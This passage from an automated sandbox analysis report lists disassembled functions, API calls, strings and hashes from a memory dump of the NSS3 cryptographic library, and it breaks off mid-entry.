memcpy.VCRUNTIME140(?,?,6C89A4A1,?,00000000,?,6C89A4A1,?,00000000,?,00000001), ref: 6C87F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C89A4A1,?,00000000,?,00000001), ref: 6C87F027

Strings

dtls13, xrefs: 6C87EF33

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: a7e0f9d47ecc42b170448603762b404200b585100d955a99a978e818bae65da0
Instruction ID: fdd7748dceabfc94be462b5aafabb18b4caaca7bf0e498b2241044886b6d4587
Opcode Fuzzy Hash: a7e0f9d47ecc42b170448603762b404200b585100d955a99a978e818bae65da0
Instruction Fuzzy Hash: 7F310171A04215AFC730DF28CD80B9AB7E4AF4934CF258869E8189BB51F731E915CBE1

Function 6C7FAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7FAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C919500,6C7F3F91), ref: 6C7FAFD2

Part of subcall function 6C84B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9218D0,?), ref: 6C84B095

DER_GetInteger_Util.NSS3(?), ref: 6C7FB007

Part of subcall function 6C846A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C7F1666,?,6C7FB00C,?), ref: 6C846AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C7FB02F
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C7FB046
PL_FreeArenaPool.NSS3 ref: 6C7FB058
PL_FinishArenaPool.NSS3 ref: 6C7FB060

Strings

security, xrefs: 6C7FAFB8

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 7c85405b74c84634df3ad015e90610a6487f21960ace2975d7783c533eb09747
Instruction ID: a090b016bd38d8e7cba34a8f25f60cf5e287f3347051108a29dfd6cddcb35e0f
Opcode Fuzzy Hash: 7c85405b74c84634df3ad015e90610a6487f21960ace2975d7783c533eb09747
Instruction Fuzzy Hash: 9A313D7040430097DB208F28DE85BAA77A4AF8632CF544B29E8745BBD1E732E10AC757

Function 6C83CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C83CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C83CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C83D079

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 6d37d68de0f3caf1eeac8a27ef9d569a00709c6a072d06fb28483a23bb3c9a8d
Instruction ID: 4e4f6f0b9df320abd9fd4493de0befd57a141ea09597e0b8cf75aeb1e9efbc66
Opcode Fuzzy Hash: 6d37d68de0f3caf1eeac8a27ef9d569a00709c6a072d06fb28483a23bb3c9a8d
Instruction Fuzzy Hash: ABC191B19002299BDB20DF68CD80BDAB7B4BF48308F1465A9D84C97741E775EA95CFD0

Function 6C7F2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(8F4AB0E8), ref: 6C7F2C5D

Part of subcall function 6C850D30: calloc.MOZGLUE ref: 6C850D50
Part of subcall function 6C850D30: TlsGetValue.KERNEL32 ref: 6C850D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C7F2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F2CE0

Part of subcall function 6C7F2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C7F2CDA,?,00000000), ref: 6C7F2E1E
Part of subcall function 6C7F2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C7F2E33
Part of subcall function 6C7F2E00: TlsGetValue.KERNEL32 ref: 6C7F2E4E
Part of subcall function 6C7F2E00: EnterCriticalSection.KERNEL32(?), ref: 6C7F2E5E
Part of subcall function 6C7F2E00: PL_HashTableLookup.NSS3(?), ref: 6C7F2E71
Part of subcall function 6C7F2E00: PL_HashTableRemove.NSS3(?), ref: 6C7F2E84
Part of subcall function 6C7F2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C7F2E96
Part of subcall function 6C7F2E00: PR_Unlock.NSS3 ref: 6C7F2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7F2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C7F2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C7F2D3F
free.MOZGLUE(00000000), ref: 6C7F2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C7F2DB8
free.MOZGLUE ref: 6C7F2DC8

Part of subcall function 6C7F3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F3EC2
Part of subcall function 6C7F3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7F3ED6
Part of subcall function 6C7F3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7F3EEE
Part of subcall function 6C7F3E60: PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C7F3F02
Part of subcall function 6C7F3E60: PL_FreeArenaPool.NSS3 ref: 6C7F3F14
Part of subcall function 6C7F3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C7F3F27

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: fb8113a57689c5ec96038f2ce315be4540fe44ac3fd33662fd41343ea27258f5
Instruction ID: ac2685ecc72c31e640988f54c8ca54956d9d1c8bd68930d8a03929d5beaeade8
Opcode Fuzzy Hash: fb8113a57689c5ec96038f2ce315be4540fe44ac3fd33662fd41343ea27258f5
Instruction Fuzzy Hash: 9C51D071A042559BEB10DE68CECAB5B77E5EF94348F14083CE86583751E731E816CBA2

Function 6C818F70 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C818FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C818FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C818FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C819013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C819042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C81905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C819073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C8190EC

Part of subcall function 6C7E0F00: PR_GetPageSize.NSS3(6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000,?,6C77204A), ref: 6C7E0F1B
Part of subcall function 6C7E0F00: PR_NewLogModule.NSS3(clock,6C7E0936,FFFFE8AE,?,6C7716B7,00000000,?,6C7E0936,00000000,?,6C77204A), ref: 6C7E0F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C80DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C819111

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID:
API String ID: 2831689957-0
Opcode ID: 0aa4ce60c5b5821716c626ec0d5ba7b4dcf7b42f1a7d2aaa2d60ea628231e109
Instruction ID: 969ec520a4fc9cc363e94872cf90869a99e3ec0f1da90840ee9527dfc0ef1acb
Opcode Fuzzy Hash: 0aa4ce60c5b5821716c626ec0d5ba7b4dcf7b42f1a7d2aaa2d60ea628231e109
Instruction Fuzzy Hash: 22519D75A086068FCF10EF78C6C8659BBF0BF09318F554969DC449BB15EB35E884CB81

Function 6C854DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C85536F,00000022,?,?,00000000,?), ref: 6C854E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C854F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C854F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C854FAE
free.MOZGLUE(?), ref: 6C854FC8

Strings

%s=%s, xrefs: 6C854F89
%s=%c%s%c, xrefs: 6C854FA9

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 9ce60b2299d466efef18866b1aae54d7707c818e780284bfd6bb84d902722343
Instruction ID: 634aca73c9a1a5b0c67b11677cb234debc60606cdff738dad1b6ebb613f1fbe5
Opcode Fuzzy Hash: 9ce60b2299d466efef18866b1aae54d7707c818e780284bfd6bb84d902722343
Instruction Fuzzy Hash: 00517F31B041498BEF61CA6DC6507FF7BF59FC6318FA88925E890A7B40D3B698358790

Function 6C82ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C82ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C82AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C82AD23

Part of subcall function 6C90D930: PL_strncpyz.NSS3(?,?,?), ref: 6C90D963

PR_LogPrint.NSS3(?,00000000), ref: 6C82AD39

Strings

C_MessageDecryptFinal, xrefs: 6C82ACE1
hSession = 0x%x, xrefs: 6C82ACFE, 6C82AD0E
(CK_INVALID_HANDLE), xrefs: 6C82AD1C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: b9180dc88730a41ad803256fc4b60d022b7f06bea62639754c7f4f94ef15ccd0
Instruction ID: dbb867626d74db8779a354aeb2d9c8e82d09f3be14e8f365ee5127f98db6c6f0
Opcode Fuzzy Hash: b9180dc88730a41ad803256fc4b60d022b7f06bea62639754c7f4f94ef15ccd0
Instruction Fuzzy Hash: BC213771705104DFDB109F68DE8CBAB33B5AF4230EF944829E80997B01DB38D888CAD2

Function 6C808CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C81124D,00000001), ref: 6C808D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C81124D,00000001), ref: 6C808D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C81124D,00000001), ref: 6C808D73
PR_Unlock.NSS3(?,?,?,?,?,6C81124D,00000001), ref: 6C808D8C

Part of subcall function 6C89DD70: TlsGetValue.KERNEL32 ref: 6C89DD8C
Part of subcall function 6C89DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C89DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C81124D,00000001), ref: 6C808DBA

Strings

KRAM, xrefs: 6C808CF9
KRAM, xrefs: 6C808D3E

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: e51a01b6d48128a3d8355da9f39581745828f087460bd63b1ef62406214fb4d3
Instruction ID: 58f7a4a28179e10b8e21cb71ad34141fb41507b9ae2fcc65d6eb6b4b7c9122b8
Opcode Fuzzy Hash: e51a01b6d48128a3d8355da9f39581745828f087460bd63b1ef62406214fb4d3
Instruction Fuzzy Hash: E4216BB1B046058FCB10AF38CA8455AB7F0BF55309F158E6ADC888B701EB34D885CB91

Function 6C900ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C900EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C900EFA

Part of subcall function 6C7EAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C7EAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C900ED9, 6C900EE5, 6C900F06, 6C900F0B
Aborting, xrefs: 6C900EB3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 4cd1dd00c16bbdb80904ed06253b7b17727bbc398bf74ca7fde91d06bc86af4e
Instruction ID: 8cf1a6284044ba4e35e687289de06dfdd696f0fca97077f3483711a34c827cf5
Opcode Fuzzy Hash: 4cd1dd00c16bbdb80904ed06253b7b17727bbc398bf74ca7fde91d06bc86af4e
Instruction Fuzzy Hash: 7401C0B6A00214ABDF01AF64DC4A89B3F7CEF46268F108068FD0987701D631E9649BA2

Function 6C8C4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C8C4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8C4DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8C4DCB
API call with %s database connection pointer, xrefs: 6C8C4DBD
invalid, xrefs: 6C8C4DB8
misuse, xrefs: 6C8C4DD5
%s at line %d of [%.10s], xrefs: 6C8C4DDA

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: c9051b3f3424ce9e48425b0ca87f72fa7babfd04880113d0c2d3900b3e0ee506
Instruction ID: 194520f8941aad94575498284f00604027e27b426c11020a8b11f5d60244cbca
Opcode Fuzzy Hash: c9051b3f3424ce9e48425b0ca87f72fa7babfd04880113d0c2d3900b3e0ee506
Instruction Fuzzy Hash: 06F05912F245286FD7106214CE14FA233554FD131BF060DE0EF486BEA2D60AD8D082C2

Function 6C8C4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C8C4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8C4E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8C4E38
API call with %s database connection pointer, xrefs: 6C8C4E2A
invalid, xrefs: 6C8C4E25
misuse, xrefs: 6C8C4E42
%s at line %d of [%.10s], xrefs: 6C8C4E47

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 8b5bd4a759766b5dfd3abbf130505e62c78e3b861a46c472513ae6caf4f861ea
Instruction ID: 12fb0db83363384cb1a9bd1aeda99ba1cd9ce3ca6139e003a7b519e8460864b8
Opcode Fuzzy Hash: 8b5bd4a759766b5dfd3abbf130505e62c78e3b861a46c472513ae6caf4f861ea
Instruction Fuzzy Hash: 4BF09E11F444286BD73052208E14FA337864BC1339F0A4DA0EA4967FA3C309D8A142D3

Function 6C830C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C831444,?,00000001,?,00000000,00000000,?,?,6C831444,?,?,00000000,?,?), ref: 6C830CB3

Part of subcall function 6C89C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C89C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C831444,?,00000001,?,00000000,00000000,?,?,6C831444,?), ref: 6C830DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C831444,?,00000001,?,00000000,00000000,?,?,6C831444,?), ref: 6C830DEC

Part of subcall function 6C850F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C7F2AF5,?,?,?,?,?,6C7F0A1B,00000000), ref: 6C850F1A
Part of subcall function 6C850F10: malloc.MOZGLUE(00000001), ref: 6C850F30
Part of subcall function 6C850F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C850F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C831444,?,00000001,?,00000000,00000000,?), ref: 6C830DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C831444,?,00000001,?,00000000), ref: 6C830E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C831444,?,00000001,?,00000000,00000000,?), ref: 6C830E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C831444,?,00000001,?,00000000,00000000,?,?,6C831444,?,?,00000000), ref: 6C830E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C831444,?,00000001,?,00000000,00000000,?), ref: 6C830E79

Part of subcall function 6C841560: TlsGetValue.KERNEL32(00000000,?,6C810844,?), ref: 6C84157A
Part of subcall function 6C841560: EnterCriticalSection.KERNEL32(?,?,?,6C810844,?), ref: 6C84158F
Part of subcall function 6C841560: PR_Unlock.NSS3(?,?,?,?,6C810844,?), ref: 6C8415B2

Part of subcall function 6C80B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C811397,00000000,?,6C80CF93,5B5F5EC0,00000000,?,6C811397,?), ref: 6C80B1CB
Part of subcall function 6C80B1A0: free.MOZGLUE(5B5F5EC0,?,6C80CF93,5B5F5EC0,00000000,?,6C811397,?), ref: 6C80B1D2

Part of subcall function 6C8089E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C8088AE,-00000008), ref: 6C808A04
Part of subcall function 6C8089E0: EnterCriticalSection.KERNEL32(?), ref: 6C808A15
Part of subcall function 6C8089E0: memset.VCRUNTIME140(6C8088AE,00000000,00000132), ref: 6C808A27
Part of subcall function 6C8089E0: PR_Unlock.NSS3(?), ref: 6C808A35

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
